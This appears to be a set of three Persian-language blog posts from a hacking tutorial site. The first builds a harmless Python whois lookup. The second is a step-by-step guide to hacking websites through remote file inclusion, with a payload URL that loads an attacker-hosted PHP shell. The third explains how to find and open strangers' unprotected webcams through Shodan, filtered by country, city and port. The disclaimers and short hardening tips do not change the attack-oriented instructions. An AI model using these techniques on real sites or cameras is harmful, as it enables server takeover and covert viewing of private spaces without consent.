گرفتن whois دامنه و دریافت اطلاعات با پایتون

به نام خدا

whois جیست؟

زمانی که فقط یک سرویس دهنده اینترنت بنام ARPANET بود ,یک سازمان بنام DARPA تنها مسئول ثبت دامنه وجود دارد و تمامی دامنه ها به راحتی قابل دسترسی به اطلاعات پایگاه داده WHOIS بود . واقعیت این است که تنها یک سازمان مدیریت هر دو دامنه ها را ثبت  و جزئیات مربوط به WHOIS را منتشر می کنند.به آرامی و با تکامل شبکه جهانی وب ثبت دامنه و مدیریت WHOIS به دور از DARPA منتقل شده و اکنون می توانید دامنه خود را توسط چند  شرکت معتبر اطالاعات خود را ثبت نمایید تعدادی از دامنه ها در همان زمان که تعداد آنها نیز زیاد بود و همچنین این اطلاعات تمامی مشخصات فرد و سازمان  را در اختیار عموم قرار میداد که از همه مهمتر ایمیل اشخاص بود که هکرها با استفاده از این موقعیت حملات فیشینگ را به راحتی انجام میدادند و همچنین هرزنامه های زیادی در آن زمان رایج بود و بدلیل نمایش و مشکلات در اطلاعات WHOIS پروتکل WHOIS تجدید نظر شد و جستجو کلمات و ایمیلها ممنوع شد و امروزه نمایش ایمیل توسط سرویس دهنده ها بصورت تصویر می باشد که این عمر تا حد زیادی از خرابکاری ها توسط هکرها و هرزنامه ها را میگیرد.

 

 

ساخت whois lookup با پایتون:

ابتدا با دستور زیر کتابخانه مخصوص رو دانلود و نصب میکنیم

Pip install python-whois

سپس یک فایل پایتونی ایجاد کنید با پسوند .py

باید کد زیر را جایگذاری و ذخیره کنیم

class="lang-python"

1 #Import library for whois
2 import whois
3 #input url for geting information domain
4 url = input("your target url >>> ")
5 #geting information domain
6 wh = whois.whois(url)
7 #print output
8 print ("\n----------------------------------------\n")
9 print (wh.text)

 

در لاین دوم با دستور import کتابخانه whois رو وارد برنامه میکنیم

در لاین چهارم ادرس قربانی رو از کاربر میگیریم و در متغییر url ذخیره میکنیم

در لاین ششم هم اطلاعات  دامنه رو میگیریم و در متغییر wh ذخیره میکنیم

در لاین هشتم هم با \n یک خط پایین میری و با گذاشتن --- اون هارو از هم جدا میکنیم

در لاین نهم هم متغییر wh رو در حالت تکست با دستور پرینت چاپ میکنیم

 

این مقاله با فرض این هست که پایتون رو نصب دارید و اگر هرجای کار مشکلی بوجود اومد داخل نظرات بگین تا باهم مشکل رو رفع کنیم

 

هک سایت با باگ RFI + تامین امنیت

به نام خدا

با اموزش باگ rfi  در دوره اموزش های تست نفوذ وب اپلیکیشن در خدمتتونیم

 

 

 باگ RFI چیست ؟

باگ rfi جزو خطرناک ترین باگ ها محسوب میشه چون میشه با اون دسترسی سرور هم گرفت

این باگ توسط اشتباهات برنامه نویسی ایجاد میشود و مخفف Remote File Inclusion است که مستقیما باعث اجرای شل اسکریپت در سرور شود برای پچ کردن این باگ نیازه دستورات http:// , https:// در ورودی ها ممنوع بشه و از فایروال ها استفاده بشه

 

 

اموزش باگ RFI

برای پیدا کردن باگ باید ورودی های مشکوک رو مورد تست قرار بدین

و میتونین از شل های مختلفی مثل :c99 , alpha , c100 , minishell , … هم استفاده کنین

اول باید شل خودتون رو داخل یک هاست اپلود کین کنین ( باید پسوند فایل رو از پی اچ پی به .txt تغییر بدین )

به عنوان مثال به ادرس زیر توجه کنید

http://target.com/intex.php?page=index.php

در ورودی بالا وبسایت index رو به عنوان ورودی میگیره حالا اگر ما بجای index ادرس شل خودمون رو بدیم شل ما رو اجرا میکنه! و دسترسی ادمین از کل سایت یا سرور میگیریم

و url نهایی ما به شکل زیر میشه

http://target.com/index.php?page=http://host.com/myShell.txt

 

تیم ما هیچ گونه مسئولیتی در قبال سوء استفاده برخی افراد ندارد!

اگر سوال یا ابهامی بود در بخش نظرات مطرح کنید

هک دوربین مداربسته با شودان - هک با شودان

به نام خدا

با یه قسمت دیگه از سری اموزش های هک و امنیت در خدمتتون هستیم تو این مطلب قراره باهم هک دوربین های مداربسته با استفاده از موتور جستوجوی شودان رو انجام بدیم

 

شودان چیست ؟

شودان یک موتور جستوجوی بسیار محبوب و پر کاربرد بین هکر هاست

برخلاف دیگر موتور های جستجو این ابزار بجای ایندکس کردن سایت ها به ایندکس کردن سیستم هایی که به اینترنت متصل هستند میپردازه این سیستم ها هر چیزی میتونن باشن مثل چاپگر انواع سرور دوربین ها و... که علاوه بر اون پورت های باز اون سیستم رو هم میگه تا روند کار راحت تر بشه

 

 

اموزش هک دوربین مدار بسته با شودان :

برای اینکه بتونین تمام سیستم هارو مشاهده کنین نیاز به یک کانت دارید که میتونین به راحتی با مراجعه به لینک زیر اون رو بسازید و فعالش کنید

https://account.shodan.io/register

بعد از فعال کردن به حساب خودتون لاگین کنین و بعد با صفحه زیر مواجه میشین که باید روی شودان کلیک کنین

 

 

حالا باید در قسمت جستوجو نوع دستگاهی رو که میخواین جستوجو کنین میتونین برند هارو هم سرچ کنین ولی ما webcams رو سرچ میکنیم

چند لحظه باید صبر کنین تا اطلاعات کامل رو بگیره

تمام ایپی هایی که امده برای وبکم هستن ولی اکثرا رمز دارن جز اونایی که مثل تصویر زیر یک پیش نمایش ازشون رو نشون میده که ایپی اون هارو باید جداگانه کپی و در یک تب دیگه باز کنین

 

 

اگر ایپی روی پورت 80 باز باشه و برای مرورگر قابل تفهیم باشه مثل تصویر زیر نمایش داده میشه

 

 

اگر روی هر ایپی هم کلیک کنید اطلاعاات کامل تری ازجمله پورت های باز و... رو هم میده  گاها ایپی ها روی یک دمنه ست هستن که فقط با اون بالا میاد که اون هم میتونین ازز تو همین بخش ببینین بعضا روی پورت هایی غیر از 80 هستن که با اضافه کردن : و پورت مورد نظر به ایپی میتونین وارد بشین

بعد از اینکه سرچ کردین هم در سمت چپ میتونین کشور و بعد هم از همون قسمت شهر رو انتخاب کنین

با دستور port: هم میتونین بگین سیستم های متصل که پورت مدنظر روش بازه رو بیاره مثلا با دستو webcams port:80 فقط دوربین هایی که با پورت 80 هستن رو بالا میاره تا برای مرورگر قایل درک باشه

 

این پست فقط جهت آشنایی شما با شودان بود و همچنین برای افرادی که در زمینه دوربین های مداربسته فعالیت دارند تا در مورد اهمیت پسورد ها و پورت ها و... بیشتر اگاه باشن

توصیه ما به افرادی که با دوربین ها مدار بسته و شبکه ها سروکار دارن اینه که پورت 80 رو ببندن و پسورد و یوزر قدرت مندی بزارن

اگر سوالی داشتین داخل نظرات بگین تا پاسخگو باشیم

( تیم ما هیچ گونه مسئولیتی در قبال سوء استفاده بعضی از افراد ندارد! )